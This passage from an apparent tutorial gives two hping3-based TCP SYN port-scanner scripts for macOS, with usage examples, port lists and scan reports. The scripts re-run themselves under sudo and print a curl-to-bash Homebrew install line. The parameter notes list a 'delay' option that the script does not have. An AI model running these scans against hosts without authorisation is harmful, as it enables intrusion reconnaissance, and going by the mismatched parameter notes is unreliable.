echo "$port:closed" >> "${tmpfile}.closed"
else
# Port is filtered or no response
echo "$port:filtered" >> "${tmpfile}.filtered"
fi
}
# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
print_usage
exit 0
fi
# Check if target is provided
if [ -z "$TARGET" ]; then
echo -e "${RED}Error: No target specified${NC}"
echo ""
print_usage
exit 1
fi
# Validate port range
if ! validate_ports "$START_PORT" "$END_PORT"; then
exit 1
fi
# Validate threads
if ! [[ "$THREADS" =~ ^[0-9]+$ ]] || [ "$THREADS" -lt 1 ] || [ "$THREADS" -gt 500 ]; then
echo -e "${RED}Error: Threads must be between 1-500${NC}"
exit 1
fi
# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
echo -e "${RED}Error: hping3 is not installed${NC}"
echo "Install it with: brew install hping3"
echo ""
echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
echo " /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
exit 1
fi
# Check for timeout command
if ! command -v gtimeout &> /dev/null && ! command -v timeout &> /dev/null; then
echo -e "${YELLOW}Warning: timeout command not found${NC}"
echo "Install with: brew install coreutils"
echo "Continuing without timeout protection..."
echo ""
# Create wrapper function for timeout
timeout() {
shift # Remove the timeout value
"$@" # Execute the command directly
}
fi
# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
echo -e "${YELLOW}Note: TCP SYN scan requires root privileges${NC}"
echo "Re-running with sudo..."
echo ""
exec sudo "$0" "$@"
fi
# Calculate total ports
TOTAL_PORTS=$((END_PORT - START_PORT + 1))
# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║ TCP SYN PORT SCANNER ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e " ${BLUE}Target:${NC} $TARGET"
echo -e " ${BLUE}Port Range:${NC} $START_PORT - $END_PORT"
echo -e " ${BLUE}Total Ports:${NC} $TOTAL_PORTS"
echo -e " ${BLUE}Threads:${NC} $THREADS"
echo -e " ${BLUE}Scan Type:${NC} TCP SYN (Half-open)"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""
# Resolve target to IP
echo -e "${YELLOW}[*] Resolving target...${NC}"
TARGET_IP=$(ping -c 1 "$TARGET" 2>/dev/null | grep -oE "\([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\)" | tr -d '()')
if [ -z "$TARGET_IP" ]; then
TARGET_IP="$TARGET"
echo -e "${YELLOW}[*] Could not resolve hostname, using as-is${NC}"
else
echo -e "${GREEN}[✓] Target resolved to: $TARGET_IP${NC}"
fi
# Create temporary files
TMPDIR=$(mktemp -d)
OPEN_PORTS_FILE="$TMPDIR/open_ports"
trap "rm -rf $TMPDIR" EXIT
# Start time
START_TIME=$(date +%s)
echo ""
echo -e "${GREEN}[+] Starting TCP SYN scan...${NC}"
echo -e "${YELLOW}[*] Scanning $TOTAL_PORTS ports with $THREADS parallel threads${NC}"
echo ""
# Progress tracking
SCANNED=0
JOBS_COUNT=0
# Function to update progress
show_progress() {
local current=$1
local total=$2
local percent=$((current * 100 / total))
printf "\r${CYAN}Progress: [%-50s] %d%% (%d/%d ports)${NC}" \
"$(printf '#%.0s' $(seq 1 $((percent / 2))))" \
"$percent" "$current" "$total"
}
# Main scanning loop
for port in $(seq $START_PORT $END_PORT); do
# Launch scan in background
scan_port "$TARGET_IP" "$port" "$OPEN_PORTS_FILE" &
# Manage parallel jobs
JOBS_COUNT=$(jobs -r | wc -l)
while [ "$JOBS_COUNT" -ge "$THREADS" ]; do
sleep 0.05
JOBS_COUNT=$(jobs -r | wc -l)
done
# Update progress
((SCANNED++))
show_progress "$SCANNED" "$TOTAL_PORTS"
done
# Wait for remaining jobs
echo -e "\n${YELLOW}[*] Waiting for remaining scans to complete...${NC}"
wait
# End time
END_TIME=$(date +%s)
DURATION=$((END_TIME - START_TIME))
# Process results
echo -e "\r\033[K"
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN} SCAN RESULTS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""
# Count results
OPEN_COUNT=0
CLOSED_COUNT=0
FILTERED_COUNT=0
if [ -f "$OPEN_PORTS_FILE" ]; then
OPEN_COUNT=$(wc -l < "$OPEN_PORTS_FILE" | tr -d ' ')
fi
if [ -f "${OPEN_PORTS_FILE}.closed" ]; then
CLOSED_COUNT=$(wc -l < "${OPEN_PORTS_FILE}.closed" | tr -d ' ')
fi
if [ -f "${OPEN_PORTS_FILE}.filtered" ]; then
FILTERED_COUNT=$(wc -l < "${OPEN_PORTS_FILE}.filtered" | tr -d ' ')
fi
# Display open ports
if [ "$OPEN_COUNT" -gt 0 ]; then
echo -e "${GREEN}[✓] Found $OPEN_COUNT open port(s)${NC}"
echo ""
echo -e "${MAGENTA}Open Ports:${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
printf "${WHITE}%-10s %-15s %s${NC}\n" "PORT" "STATE" "SERVICE"
echo -e "${CYAN}────────────────────────────────────────${NC}"
# Sort and display open ports
sort -t: -k1 -n "$OPEN_PORTS_FILE" | while IFS=: read -r port state service; do
printf "${GREEN}%-10s${NC} ${GREEN}%-15s${NC} ${YELLOW}%s${NC}\n" "$port/tcp" "$state" "$service"
done
# Save detailed report
REPORT_FILE="tcp_scan_${TARGET}_$(date +%Y%m%d_%H%M%S).txt"
{
echo "TCP SYN Scan Report"
echo "==================="
echo "Target: $TARGET ($TARGET_IP)"
echo "Port Range: $START_PORT - $END_PORT"
echo "Scan Date: $(date)"
echo "Duration: ${DURATION} seconds"
echo "Scan Rate: $(( TOTAL_PORTS / (DURATION + 1) )) ports/second"
echo ""
echo "Results Summary:"
echo "----------------"
echo "Open ports: $OPEN_COUNT"
echo "Closed ports: $CLOSED_COUNT"
echo "Filtered ports: $FILTERED_COUNT"
echo ""
echo "Open Ports Detail:"
echo "------------------"
sort -t: -k1 -n "$OPEN_PORTS_FILE" | while IFS=: read -r port state service; do
printf "%-10s %-15s %s\n" "$port/tcp" "$state" "$service"
done
} > "$REPORT_FILE"
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${BLUE}[*] Detailed report saved to: $REPORT_FILE${NC}"
else
echo -e "${YELLOW}[-] No open ports found in the specified range${NC}"
echo -e "${YELLOW} Possible reasons:${NC}"
echo -e "${YELLOW} • All ports are closed or filtered${NC}"
echo -e "${YELLOW} • Firewall is blocking SYN packets${NC}"
echo -e "${YELLOW} • Target is down or unreachable${NC}"
fi
# Display statistics
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN} STATISTICS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e " ${BLUE}Ports Scanned:${NC} $TOTAL_PORTS"
echo -e " ${GREEN}Open:${NC} $OPEN_COUNT"
echo -e " ${RED}Closed:${NC} $CLOSED_COUNT"
echo -e " ${YELLOW}Filtered:${NC} $FILTERED_COUNT"
echo -e " ${BLUE}Scan Duration:${NC} ${DURATION} seconds"
echo -e " ${BLUE}Scan Rate:${NC} ~$(( TOTAL_PORTS / (DURATION + 1) )) ports/sec"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
exit 0
EOF
chmod +x ./tcp_syn_scan.sh
How to Run:
# Scan default ports 1-1000
./tcp_syn_scan.sh example.com
# Scan specific range
./tcp_syn_scan.sh 192.168.1.1 1 100
# Quick scan of common services
./tcp_syn_scan.sh server.local 20 445
# Full port scan with 100 threads
./tcp_syn_scan.sh example.com 1 65535 100
# Scan web ports
./tcp_syn_scan.sh webserver.com 80 443
# Scan database ports
./tcp_syn_scan.sh dbserver.com 3300 3400
# Get help
./tcp_syn_scan.sh --help
Parameters Explained:
– **target** (required): Hostname or IP address to scan
– **start_port** (optional, default: 1): First port in the range to scan
– **end_port** (optional, default: 1000): Last port in the range to scan
– **delay** (optional, default: u1000): Delay between packets (u=microseconds)
Script 5: Common Ports Scanner:
Purpose:
Scans a predefined list of commonly used ports with service identification. This is more efficient than scanning large port ranges when looking for standard services.
Create the Script:
brew install coreutils
cat > ./common_ports_scan.sh << 'EOF'
#!/bin/zsh
# Common Ports Scanner using hping3
# Scans commonly used ports with predefined or custom port lists
# Requires: hping3 (install with: brew install hping3)
# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
WHITE='\033[1;37m'
NC='\033[0m' # No Color
# Parse arguments
TARGET="$1"
SCAN_TYPE="${2:-default}"
CUSTOM_PORTS="$3"
THREADS="${4:-50}"
# Port categories
declare -A PORT_CATEGORIES=(
["default"]="21,22,23,25,53,80,110,143,443,445,3306,3389,5432,8080,8443"
["web"]="80,443,8080,8443,8000,8888,3000,5000,9000"
["mail"]="25,110,143,465,587,993,995"
["database"]="1433,1521,3306,5432,5984,6379,7000,7001,8086,9042,9200,11211,27017"
["remote"]="22,23,3389,5900,5901,5902"
["file"]="20,21,69,139,445,873,2049"
["top100"]="7,9,13,21,22,23,25,26,37,53,79,80,81,88,106,110,111,113,119,135,139,143,144,179,199,389,427,443,444,445,465,513,514,515,543,544,548,554,587,631,646,873,990,993,995,1025,1026,1027,1028,1029,1110,1433,1521,1701,1720,1723,1755,1900,2000,2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000,6001,6379,6646,7000,7070,8000,8008,8009,8080,8081,8443,8888,9100,9200,9999,10000,27017,32768,49152,49153,49154,49155,49156,49157"
["top1000"]="1,3,4,6,7,9,13,17,19,20,21,22,23,24,25,26,30,32,33,37,42,43,49,53,70,79,80,81,82,83,84,85,88,89,90,99,100,106,109,110,111,113,119,125,135,139,143,144,146,161,163,179,199,211,212,222,254,255,256,259,264,280,301,306,311,340,366,389,406,407,416,417,425,427,443,444,445,458,464,465,481,497,500,512,513,514,515,524,541,543,544,545,548,554,555,563,587,593,616,617,625,631,636,646,648,666,667,668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800,801,808,843,873,880,888,898,900,901,902,903,911,912,981,987,990,992,993,995,999,1000,1001,1002,1007,1009,1010,1011,1021,1022,1023,1024,1025,1026,1027,1028,1029,1030,1031,1032,1033,1034,1035,1036,1037,1038,1039,1040,1041,1042,1043,1044,1045,1046,1047,1048,1049,1050,1051,1052,1053,1054,1055,1056,1057,1058,1059,1060,1061,1062,1063,1064,1065,1066,1067,1068,1069,1070,1071,1072,1073,1074,1075,1076,1077,1078,1079,1080,1081,1082,1083,1084,1085,1086,1087,1088,1089,1090,1091,1092,1093,1094,1095,1096,1097,1098,1099,1100,1102,1104,1105,1106,1107,1108,1110,1111,1112,1113,1114,1117,1119,1121,1122,1123,1124,1126,1130,1131,1132,1137,1138,1141,1145,1147,1148,1149,1151,1152,1154,1163,1164,1165,1166,1169,1174,1175,1183,1185,1186,1187,1192,1198,1199,1201,1213,1216,1217,1218,1233,1234,1236,1244,1247,1248,1259,1271,1272,1277,1287,1296,1300,1301,1309,1310,1311,1322,1328,1334,1352,1417,1433,1434,1443,1455,1461,1494,1500,1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687,1688,1700,1717,1718,1719,1720,1721,1723,1755,1761,1782,1783,1801,1805,1812,1839,1840,1862,1863,1864,1875,1900,1914,1935,1947,1971,1972,1974,1984,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,2013,2020,2021,2022,2030,2033,2034,2035,2038,2040,2041,2042,2043,2045,2046,2047,2048,2049,2065,2068,2099,2100,2103,2105,2106,2107,2111,2119,2121,2126,2135,2144,2160,2161,2170,2179,2190,2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381,2382,2383,2393,2394,2399,2401,2492,2500,2522,2525,2557,2601,2602,2604,2605,2607,2608,2638,2701,2702,2710,2717,2718,2725,2800,2809,2811,2869,2875,2909,2910,2920,2967,2968,2998,3000,3001,3003,3005,3006,3007,3011,3013,3017,3030,3031,3052,3071,3077,3128,3168,3211,3221,3260,3261,3268,3269,3283,3300,3301,3306,3322,3323,3324,3325,3333,3351,3367,3369,3370,3371,3372,3389,3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689,3690,3703,3737,3766,3784,3800,3801,3809,3814,3826,3827,3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000,4001,4002,4003,4004,4005,4006,4045,4111,4125,4126,4129,4224,4242,4279,4321,4343,4443,4444,4445,4446,4449,4550,4567,4662,4848,4899,4900,4998,5000,5001,5002,5003,5004,5009,5030,5033,5050,5051,5054,5060,5061,5080,5087,5100,5101,5102,5120,5190,5200,5214,5221,5222,5225,5226,5269,5280,5298,5357,5405,5414,5431,5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678,5679,5718,5730,5800,5801,5802,5810,5811,5815,5822,5825,5850,5859,5862,5877,5900,5901,5902,5903,5904,5905,5906,5907,5908,5909,5910,5911,5912,5913,5914,5915,5922,5925,5950,5952,5959,5960,5961,5962,5963,5987,5988,5989,5998,5999,6000,6001,6002,6003,6004,6005,6006,6007,6009,6025,6059,6100,6101,6106,6112,6123,6129,6156,6346,6379,6389,6502,6510,6543,6547,6565,6566,6567,6580,6646,6666,6667,6668,6669,6689,6692,6699,6779,6788,6789,6792,6839,6881,6901,6969,7000,7001,7002,7004,7007,7019,7025,7070,7100,7103,7106,7200,7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777,7778,7800,7911,7920,7921,7937,7938,7999,8000,8001,8002,8007,8008,8009,8010,8011,8021,8022,8031,8042,8045,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8093,8099,8100,8180,8181,8192,8193,8194,8200,8222,8254,8290,8291,8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651,8652,8654,8701,8800,8873,8888,8899,8994,9000,9001,9002,9003,9009,9010,9011,9040,9050,9071,9080,9081,9090,9091,9099,9100,9101,9102,9103,9110,9111,9200,9207,9220,9290,9300,9415,9418,9485,9500,9502,9503,9535,9575,9593,9594,9595,9618,9666,9876,9877,9878,9898,9900,9917,9929,9943,9944,9968,9998,9999,10000,10001,10002,10003,10004,10009,10010,10012,10024,10025,10082,10180,10215,10243,10566,10616,10617,10621,10626,10628,10629,10778,11110,11111,11211,11967,12000,12174,12265,12345,13456,13722,13782,13783,14000,14238,14441,14442,15000,15002,15003,15004,15660,15742,16000,16001,16012,16016,16018,16080,16113,16992,16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221,20222,20828,21571,22939,23502,24444,24800,25734,25735,26214,27000,27017,27352,27353,27355,27356,27715,28201,30000,30718,30951,31038,31337,32768,32769,32770,32771,32772,32773,32774,32775,32776,32777,32778,32779,32780,32781,32782,32783,32784,32785,33354,33899,34571,34572,34573,35500,38292,40193,40911,41511,42510,44176,44442,44443,44501,45100,48080,49152,49153,49154,49155,49156,49157,49158,49159,49160,49161,49163,49165,49167,49175,49176,49400,49999,50000,50001,50002,50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055,55056,55555,55600,56737,56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"
)
# Service mapping
declare -A SERVICE_NAMES=(
[20]="FTP-Data"
[21]="FTP"
[22]="SSH"
[23]="Telnet"
[25]="SMTP"
[53]="DNS"
[67]="DHCP"
[68]="DHCP"
[69]="TFTP"
[80]="HTTP"
[110]="POP3"
[123]="NTP"
[135]="MSRPC"
[137]="NetBIOS-NS"
[138]="NetBIOS-DGM"
[139]="NetBIOS-SSN"
[143]="IMAP"
[161]="SNMP"
[162]="SNMP-Trap"
[389]="LDAP"
[443]="HTTPS"
[445]="SMB"
[465]="SMTPS"
[514]="Syslog"
[515]="LPD"
[587]="SMTP-TLS"
[636]="LDAPS"
[873]="Rsync"
[993]="IMAPS"
[995]="POP3S"
[1433]="MSSQL"
[1521]="Oracle"
[1723]="PPTP"
[2049]="NFS"
[3306]="MySQL"
[3389]="RDP"
[5432]="PostgreSQL"
[5900]="VNC"
[5984]="CouchDB"
[6379]="Redis"
[7000]="Cassandra"
[8000]="HTTP-Alt"
[8080]="HTTP-Proxy"
[8086]="InfluxDB"
[8443]="HTTPS-Alt"
[8888]="HTTP-Alt2"
[9000]="SonarQube"
[9042]="Cassandra-CQL"
[9200]="Elasticsearch"
[11211]="Memcached"
[27017]="MongoDB"
)
# Function to print usage
print_usage() {
local script_name="./common_ports_scan.sh"
echo "Usage: $script_name <target> [scan_type|custom_ports] [threads]"
echo ""
echo "Scan Types:"
echo " default - Top 15 most common ports (default)"
echo " web - Web server ports (80, 443, 8080, etc.)"
echo " mail - Mail server ports (25, 110, 143, etc.)"
echo " database - Database ports (MySQL, PostgreSQL, MongoDB, etc.)"
echo " remote - Remote access ports (SSH, RDP, VNC, etc.)"
echo " file - File sharing ports (FTP, SMB, NFS, etc.)"
echo " top100 - Top 100 most common ports"
echo " top1000 - Top 1000 most common ports"
echo " custom - Specify custom ports as comma-separated list"
echo ""
echo "Parameters:"
echo " target - Hostname or IP address to scan"
echo " scan_type - Type of scan or comma-separated port list"
echo " threads - Number of parallel threads (default: 50)"
echo ""
echo "Examples:"
echo " $script_name example.com # Scan default ports"
echo " $script_name example.com web # Scan web ports"
echo " $script_name example.com database # Scan database ports"
echo " $script_name example.com top100 # Scan top 100 ports"
echo " $script_name example.com \"22,80,443,3306\" # Custom ports"
echo " $script_name example.com top1000 100 # Top 1000 with 100 threads"
}
# Function to get service name
get_service_name() {
local port=$1
if [[ -n "${SERVICE_NAMES[$port]}" ]]; then
echo "${SERVICE_NAMES[$port]}"
else
# Try to get from system services
local service=$(grep -w "^[^#]*$port/tcp" /etc/services 2>/dev/null | head -1 | awk '{print $1}')
if [[ -n "$service" ]]; then
echo "$service"
else
echo "Unknown"
fi
fi
}
# Function to scan a single port
scan_port() {
local target=$1
local port=$2
local tmpfile=$3
# Run hping3 with timeout
local result=$(timeout 2 hping3 -S -p "$port" -c 1 "$target" 2>/dev/null || true)
if echo "$result" | grep -q "flags=SA"; then
# Port is open (SYN+ACK received)
local service=$(get_service_name "$port")
echo "$port:$service" >> "$tmpfile"
echo -e "${GREEN}[✓] Port $port/tcp open - $service${NC}"
fi
}
# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
print_usage
exit 0
fi
# Check if target is provided
if [ -z "$TARGET" ]; then
echo -e "${RED}Error: No target specified${NC}"
echo ""
print_usage
exit 1
fi
# Determine ports to scan
if [[ "$SCAN_TYPE" =~ ^[0-9,]+$ ]]; then
# Custom ports provided
PORTS_TO_SCAN="$SCAN_TYPE"
SCAN_DESCRIPTION="Custom ports"
elif [[ -n "${PORT_CATEGORIES[$SCAN_TYPE]}" ]]; then
# Predefined category
PORTS_TO_SCAN="${PORT_CATEGORIES[$SCAN_TYPE]}"
SCAN_DESCRIPTION="$SCAN_TYPE ports"
else
# Invalid scan type, use default
PORTS_TO_SCAN="${PORT_CATEGORIES[default]}"
SCAN_DESCRIPTION="Default common ports"
if [[ -n "$SCAN_TYPE" ]] && [[ "$SCAN_TYPE" != "default" ]]; then
echo -e "${YELLOW}Warning: Unknown scan type '$SCAN_TYPE', using default${NC}"
fi
fi
# Parse threads parameter
if [[ -n "$CUSTOM_PORTS" ]] && [[ "$CUSTOM_PORTS" =~ ^[0-9]+$ ]]; then
THREADS="$CUSTOM_PORTS"
elif [[ -n "$3" ]] && [[ "$3" =~ ^[0-9]+$ ]]; then
THREADS="$3"
fi
# Validate threads
if ! [[ "$THREADS" =~ ^[0-9]+$ ]] || [ "$THREADS" -lt 1 ] || [ "$THREADS" -gt 500 ]; then
THREADS=50
fi
# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
echo -e "${RED}Error: hping3 is not installed${NC}"
echo "Install it with: brew install hping3"
echo ""
echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
echo " /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
exit 1
fi
# Check for timeout command and create appropriate wrapper
if command -v gtimeout &> /dev/null; then
# macOS with coreutils installed
timeout() {
gtimeout "$@"
}
elif command -v timeout &> /dev/null; then
# Linux or other systems with timeout
timeout() {
command timeout "$@"
}
else
# No timeout command available
echo -e "${YELLOW}Warning: timeout command not found${NC}"
echo "Install with: brew install coreutils"
echo "Continuing without timeout protection..."
echo ""
timeout() {
shift # Remove timeout value
"$@" # Execute command directly
}
fi
# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
echo -e "${YELLOW}Note: TCP SYN scan requires root privileges${NC}"
echo "Re-running with sudo..."
echo ""
exec sudo "$0" "$@"
fi
# Convert ports to array (zsh compatible)
IFS=',' PORT_ARRAY=(${=PORTS_TO_SCAN})
TOTAL_PORTS=${#PORT_ARRAY[@]}
# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║ COMMON PORTS SCANNER ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e " ${BLUE}Target:${NC} $TARGET"
echo -e " ${BLUE}Scan Type:${NC} $SCAN_DESCRIPTION"
echo -e " ${BLUE}Total Ports:${NC} $TOTAL_PORTS"
echo -e " ${BLUE}Threads:${NC} $THREADS"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""
# Resolve target
echo -e "${YELLOW}[*] Resolving target...${NC}"
TARGET_IP=$(ping -c 1 "$TARGET" 2>/dev/null | grep -oE "\([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\)" | tr -d '()')
if [ -z "$TARGET_IP" ]; then
TARGET_IP="$TARGET"
echo -e "${YELLOW}[*] Could not resolve hostname, using as-is${NC}"
else
echo -e "${GREEN}[✓] Target resolved to: $TARGET_IP${NC}"
fi
# Create temporary files
TMPDIR=$(mktemp -d)
OPEN_PORTS_FILE="$TMPDIR/open_ports"
trap "rm -rf $TMPDIR" EXIT
# Start time
START_TIME=$(date +%s)
echo ""
echo -e "${GREEN}[+] Starting scan of $TOTAL_PORTS common ports...${NC}"
echo ""
# Progress tracking
SCANNED=0
# Function to update progress
show_progress() {
local current=$1
local total=$2
if [ "$total" -eq 0 ]; then
return
fi
local percent=$((current * 100 / total))
printf "\r${CYAN}Progress: [%-50s] %d%% (%d/%d ports)${NC}" \
"$(printf '#%.0s' $(seq 1 $((percent / 2))))" \
"$percent" "$current" "$total"
}
# Main scanning loop
for port in "${PORT_ARRAY[@]}"; do
# Remove any whitespace
port=$(echo "$port" | tr -d ' ')
# Launch scan in background
scan_port "$TARGET_IP" "$port" "$OPEN_PORTS_FILE" &
# Manage parallel jobs
JOBS_COUNT=$(jobs -r | wc -l)
while [ "$JOBS_COUNT" -ge "$THREADS" ]; do
sleep 0.05
JOBS_COUNT=$(jobs -r | wc -l)
done
# Update progress
((SCANNED++))
show_progress "$SCANNED" "$TOTAL_PORTS"
done
# Wait for remaining jobs
echo -e "\n${YELLOW}[*] Waiting for remaining scans to complete...${NC}"
wait
# End time
END_TIME=$(date +%s)
DURATION=$((END_TIME - START_TIME))
# Process results
echo -e "\r\033[K"
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN} SCAN RESULTS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""
# Count open ports
OPEN_COUNT=0
if [ -f "$OPEN_PORTS_FILE" ]; then
OPEN_COUNT=$(wc -l < "$OPEN_PORTS_FILE" | tr -d ' ')
fi
# Display results
if [ "$OPEN_COUNT" -gt 0 ]; then
echo -e "${GREEN}[✓] Found $OPEN_COUNT open port(s)${NC}"
echo ""
echo -e "${MAGENTA}Open Ports Summary:${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
printf "${WHITE}%-10s %-20s${NC}\n" "PORT" "SERVICE"
echo -e "${CYAN}────────────────────────────────────────${NC}"
# Sort and display open ports
sort -t: -k1 -n "$OPEN_PORTS_FILE" | while IFS=: read -r port service; do
printf "${GREEN}%-10s${NC} ${YELLOW}%-20s${NC}\n" "$port/tcp" "$service"
done
# Group by service type
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${MAGENTA}Services by Category:${NC}"
echo -e "${CYAN}────────────────────────────────────────${NC}"
# Categorize services
WEB_PORTS=""
MAIL_PORTS=""
DB_PORTS=""
REMOTE_PORTS=""
FILE_PORTS=""
OTHER_PORTS=""
while IFS=: read -r port service; do
case $port in
80|443|8080|8443|8000|8888|3000|5000|9000)
WEB_PORTS="${WEB_PORTS}${port}($service) "
;;
25|110|143|465|587|993|995)
MAIL_PORTS="${MAIL_PORTS}${port}($service) "
;;
1433|1521|3306|5432|6379|7000|9200|11211|27017)
DB_PORTS="${DB_PORTS}${port}($service) "
;;
22|23|3389|5900|5901|5902)
REMOTE_PORTS="${REMOTE_PORTS}${port}($service) "
;;
20|21|69|139|445|873|2049)
FILE_PORTS="${FILE_PORTS}${port}($service) "
;;
*)
OTHER_PORTS="${OTHER_PORTS}${port}($service) "
;;
esac
done < "$OPEN_PORTS_FILE"
[[ -n "$WEB_PORTS" ]] && echo -e "${BLUE}Web Services:${NC} $WEB_PORTS"
[[ -n "$MAIL_PORTS" ]] && echo -e "${BLUE}Mail Services:${NC} $MAIL_PORTS"
[[ -n "$DB_PORTS" ]] && echo -e "${BLUE}Database Services:${NC} $DB_PORTS"
[[ -n "$REMOTE_PORTS" ]] && echo -e "${BLUE}Remote Access:${NC} $REMOTE_PORTS"
[[ -n "$FILE_PORTS" ]] && echo -e "${BLUE}File Services:${NC} $FILE_PORTS"
[[ -n "$OTHER_PORTS" ]] && echo -e "${BLUE}Other Services:${NC} $OTHER_PORTS"
# Save report
REPORT_FILE="common_ports_${TARGET}_$(date +%Y%m%d_%H%M%S).txt"
{
echo "Common Ports Scan Report"
echo "========================"
echo "Target: $TARGET ($TARGET_IP)"
echo "Scan Type: $SCAN_DESCRIPTION"
echo "Total Ports Scanned: $TOTAL_PORTS"
echo "Open Ports Found: $OPEN_COUNT"
echo "Scan Date: $(date)"
echo "Duration: ${DURATION} seconds"
echo ""
echo "Open Ports:"
echo "-----------"
sort -t: -k1 -n "$OPEN_PORTS_FILE" | while IFS=: read -r port service; do
printf "%-10s %s\n" "$port/tcp" "$service"
done
} > "$REPORT_FILE"
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${BLUE}[*] Report saved to: $REPORT_FILE${NC}"
else
echo -e "${YELLOW}[-] No open ports found${NC}"
echo -e "${YELLOW} Possible reasons:${NC}"
echo -e "${YELLOW} • All scanned ports are closed${NC}"
echo -e "${YELLOW} • Firewall is blocking connections${NC}"
echo -e "${YELLOW} • Target is down or unreachable${NC}"
fi
# Display statistics
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN} STATISTICS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e " ${BLUE}Ports Scanned:${NC} $TOTAL_PORTS"
echo -e " ${GREEN}Open Ports:${NC} $OPEN_COUNT"
if [ "$TOTAL_PORTS" -gt 0 ]; then
echo -e " ${RED}Success Rate:${NC} $(( OPEN_COUNT * 100 / TOTAL_PORTS ))%"
else
echo -e " ${RED}Success Rate:${NC} N/A"
fi
echo -e " ${BLUE}Scan Duration:${NC} ${DURATION} seconds"
if [ "$TOTAL_PORTS" -gt 0 ]; then
echo -e " ${BLUE}Scan Rate:${NC} ~$(( TOTAL_PORTS / (DURATION + 1) )) ports/sec"
else
echo -e " ${BLUE}Scan Rate:${NC} N/A"
fi
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
# Provide recommendations
if [ "$OPEN_COUNT" -gt 0 ]; then
echo ""
echo -e "${YELLOW}Security Recommendations:${NC}"
echo -e "${CYAN}────────────────────────────────────────${NC}"
# Check for risky services
if grep -q "23:" "$OPEN_PORTS_FILE" 2>/dev/null; then
echo -e "${RED}⚠ Telnet (port 23) is insecure - use SSH instead${NC}"
fi
if grep -q "21:" "$OPEN_PORTS_FILE" 2>/dev/null; then
echo -e "${YELLOW}⚠ FTP (port 21) transmits credentials in plaintext${NC}"
fi
if grep -q "139:\|445:" "$OPEN_PORTS_FILE" 2>/dev/null; then
echo -e "${YELLOW}⚠ SMB/NetBIOS ports are exposed - ensure proper access controls${NC}"
